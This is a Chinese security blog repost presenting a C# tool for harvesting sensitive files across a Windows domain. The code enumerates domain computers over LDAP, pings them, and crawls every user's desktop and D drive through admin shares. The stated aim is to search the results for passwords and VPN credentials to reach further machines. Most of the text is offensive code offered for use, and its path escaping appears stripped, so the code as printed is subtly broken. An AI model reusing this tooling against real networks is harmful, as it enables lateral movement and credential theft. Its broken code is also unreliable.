域内批量获取敏感文件

admin 2022年9月5日08:06:18安全文章评论5 views7508字阅读25分1秒阅读模式

域内批量获取敏感文件

域内如果我们要获取指定机器,恰巧那台机器为linux只开了22等端口或者说无法从常规web打点进入,我们可以寻找运维机器的密码本,一台一台翻的话成本太高,就可以通过批量获取域内桌面文件。

0x01 批量获取域内机器名

自动化工具,当然就要全自动,懒人必备。net group "domain computers" /do ,获取机器是3个一排,然后可以通过正则删除空格,每次也麻烦,直接获取机器名更加方便。

思路就是连接ldap然后指定过滤条件(&(objectclass=computer))获取机器。

获取域内机器

public static DirectoryEntry coon = null;
public static DirectorySearcher search = null;
url = "LDAP://" + ip;
username = domain user;
password = domain pass;
coon = new DirectoryEntry(url, username, password);
search = new DirectorySearcher(coon);
search.Filter = "(&(objectclass=computer))
foreach (SearchResult r in Ldapcoon.search.FindAll())
{
string computername = "";
computername = r.Properties["cn"][0].ToString();
Console.WriteLine(computername);
}

域内批量获取敏感文件

0x02 机器探测存活

1.把上述机器放入machine.txt内,然后逐行读取

StreamReader machine_name = new StreamReader(@"machine.txt");
while (!machine_name.EndOfStream)
{
string machine = machine_name.ReadLine();
Console.WriteLine(machine);
}

2.探测探测存活,这里面向谷歌

public static bool IsMachineUp(string hostName)
{
bool retVal = false;
try
{
Ping pingSender = new Ping();
PingOptions options = new PingOptions();
// Use the default Ttl value which is 128,
// but change the fragmentation behavior.
options.DontFragment = true;
// Create a buffer of 32 bytes of data to be transmitted.
string data = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa";
byte[] buffer = Encoding.ASCII.GetBytes(data);
int timeout = 800;

PingReply reply = pingSender.Send(hostName, timeout, buffer, options);
if (reply.Status == IPStatus.Success)
{
retVal = true;
}
}
catch (Exception ex)
{
retVal = false;
//Console.ForegroundColor = ConsoleColor.Red;
//Console.WriteLine("[-]" + ex.Message);
//Console.ForegroundColor = ConsoleColor.White;
}
return retVal;
}

一般来说it机器都为工作机而非服务器,可能存在下班关机等情况,如果大多机器处于关机情况下,就会浪费比较多的时间,所以优先判断存活是很有必要的。

StreamReader machine_name = new StreamReader(@"machine.txt");
while (!machine_name.EndOfStream)
{
try
{
string machine = machine_name.ReadLine();
if (IsMachineUp(machine))
{
//操作
}
}
catch { }
}

0x03 获取桌面文件

我们这里构造获取结果目录呈现结果为:

TargetDesktopinfos
机器1
用户A
文件
用户B
文件
机器2
用户C
文件
用户D
文件

首先获取当前路径创建TargetDesktopinfos目录。

string currentpath = Directory.GetCurrentDirectory();
DesktopFiles = currentpath + "\TargetDesktopinfos";
Directory.CreateDirectory(DesktopFiles);

然后获取目标机器c:users目录,如果存在该目录创建机器名

string userpath = @"\" + machine + @"c$users";
var user_list = Directory.EnumerateDirectories(userpath);
if (Directory.Exists(userpath))
{
//创建机器名文件夹
string MachineFolder = DesktopFiles + "\" + machine;
Directory.CreateDirectory(MachineFolder);

再遍历users目录存在哪些用户,同理如果存在desktop目录创建用户名和desktop.txt。

string userpath = @"\" + machine + @"c$users";
var user_list = Directory.EnumerateDirectories(userpath);
if (Directory.Exists(userpath))
{
//创建机器名文件夹
string MachineFolder = DesktopFiles + "\" + machine;
Directory.CreateDirectory(MachineFolder);
foreach (string user in user_list)
{
string DesktopDirectoryPath = user + "\desktop";
string username = substring(user);
if (Directory.Exists(DesktopDirectoryPath))
{
//创建用户名文件夹
string UserFolder = MachineFolder + "\" + username;
Directory.CreateDirectory(UserFolder);
//创建desktop.txt文件
string Desktoptxt = UserFolder + "\desktop.txt";
StreamWriter sw = File.CreateText(Desktoptxt);
sw.Close();

接下来就是遍历desktop目录所有文件以及文件夹内的文件。

这里用到Directory.GetFileSystemEntries方法

public static string[] GetFileSystemEntries (string path, string searchPattern, System.IO.SearchOption searchOption);
第一个参数path:要搜索的路径。

第二个参数searchPattern:要与 `path` 中的文件和目录的名称匹配的搜索字符串。

第三个参数searchOption,指定搜索操作是应仅包含当前目录还是应包含所有子目录的枚举值之一。

这里的SearchOption.AllDirectories我们使用SearchOption.AllDirectories,表示在搜索操作中包括当前目录和所有它的子目录。

完整代码如下

try
{
string DesktopFiles = "";
//获取机器名
StreamReader machine_name = new StreamReader(@"machine.txt");
while (!machine_name.EndOfStream)
{
try
{
string machine = machine_name.ReadLine();
if (IsMachineUp(machine))
{
//获取当前路径
string currentpath = Directory.GetCurrentDirectory();
DesktopFiles = currentpath + "\TargetDesktopinfos";
Directory.CreateDirectory(DesktopFiles);
Console.WriteLine("[*]" + machine);
//获取users目录
string userpath = @"\" + machine + @"c$users";
var user_list = Directory.EnumerateDirectories(userpath);
if (Directory.Exists(userpath))
{
//创建机器名文件夹
string MachineFolder = DesktopFiles + "\" + machine;
Directory.CreateDirectory(MachineFolder);
foreach (string user in user_list)
{
string DesktopDirectoryPath = user + "\desktop";
string username = substring(user);
if (Directory.Exists(DesktopDirectoryPath))
{
//创建用户名文件夹
string UserFolder = MachineFolder + "\" + username;
Directory.CreateDirectory(UserFolder);
//创建desktop.txt文件
string Desktoptxt = UserFolder + "\desktop.txt";
StreamWriter sw = File.CreateText(Desktoptxt);
sw.Close();

string info_user = substring(user);
Console.ForegroundColor = ConsoleColor.Green;
Console.WriteLine("[*]" + info_user);
Console.ForegroundColor = ConsoleColor.White;

string[] AllFiles = Directory.GetFileSystemEntries(DesktopDirectoryPath, "*", SearchOption.AllDirectories);

foreach (string file in AllFiles)
{
Console.WriteLine(file);
string create_time = Directory.GetCreationTime(file).ToString();
string writeFileTo = "create time:" + create_time + " " + file + "rn";
File.AppendAllText(Desktoptxt, writeFileTo);
}
}
else
{
continue;
}
}
}
}
else
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("[-]" + machine + " is down");
Console.ForegroundColor = ConsoleColor.White;
}
}
catch (System.Exception ex)
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("[-] error");
Console.WriteLine("[-] Exception: " + ex.Message);
Console.ForegroundColor = ConsoleColor.White;
continue;
}
}
machine_name.Close();
Console.WriteLine("[+]out put to:" + DesktopFiles);
}
catch (System.Exception ex)
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("[-] error");
Console.WriteLine("[-] Exception: " + ex.Message);
Console.ForegroundColor = ConsoleColor.White;
return;
}

同理要获取DEF盘,这里就举例D盘

public static void D()
{
try
{
string DFiles = "";
StreamReader machine_name = new StreamReader(@"machine.txt");
while (!machine_name.EndOfStream)
{
try
{
string machine = machine_name.ReadLine();
if (IsMachineUp(machine))
{
string currentpath = Directory.GetCurrentDirectory();
DFiles = currentpath + "\DInfos";
Directory.CreateDirectory(DFiles);

Console.ForegroundColor = ConsoleColor.Yellow;
Console.WriteLine("[*]" + machine);
Console.ForegroundColor = ConsoleColor.White;

//获取users目录
string dpath = @"\" + machine + @"d$";
var d_list = Directory.EnumerateDirectories(dpath);
if (Directory.Exists(dpath))
{
//创建机器名文件夹
string MachineFolder = DFiles + "\" + machine;
Directory.CreateDirectory(MachineFolder);
//创建输出文本
string E_txt = MachineFolder + "\dFiles.txt";
StreamWriter sw = File.CreateText(E_txt);
sw.Close();
try
{
var files = Directory.GetFiles(dpath);
foreach (string file in files)
{
Console.WriteLine(file);
string create_time = Directory.GetCreationTime(file).ToString();
string writeFileTo = "create time:" + create_time + " " + file + "rn";
File.AppendAllText(E_txt, writeFileTo);
}

var directorys = Directory.EnumerateDirectories(dpath);
foreach (string directory in directorys)
{
if (!directory.Contains("System Volume Information"))
{
string[] AllFiles = Directory.GetFileSystemEntries(directory, "*", SearchOption.AllDirectories);
foreach (string file in AllFiles)
{
string create_time = Directory.GetCreationTime(file).ToString();
Console.WriteLine(file);
string writeFileTo = "create time:" + create_time + " " + file + "rn";
File.AppendAllText(E_txt, writeFileTo);
}
}
}
}
catch (UnauthorizedAccessException ex)
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine(ex.Message);
Console.ForegroundColor = ConsoleColor.White;
//goto cc;
}


}
}
}
catch (System.Exception ex)
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("[-] 不存在D盘");
Console.WriteLine(ex.Message);
Console.ForegroundColor = ConsoleColor.White;
continue;
}
}
machine_name.Close();
Console.WriteLine("[+]out put to:" + DFiles);
}
catch (System.Exception ex)
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("[-] error");
Console.WriteLine("[-] Exception: " + ex.Message);
Console.ForegroundColor = ConsoleColor.White;
return;
}
}

这里我们在08这台域机器桌面存放文件

域内批量获取敏感文件

测试效果

域内批量获取敏感文件

结果呈现

域内批量获取敏感文件

接下来直接文件夹搜索password或者vpn等关键字即可。


来源先知(https://xz.aliyun.com/t/11667)


注:如有绘画请联系删除





域内批量获取敏感文件

欢迎大家一起加群讨论学习和交流

域内批量获取敏感文件

快乐要懂得分享,

加倍的快乐。


原文始发于微信公众号(衡阳信安):域内批量获取敏感文件

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年9月5日08:06:18
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  域内批量获取敏感文件 http://cn-sec.com/archives/1276128.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: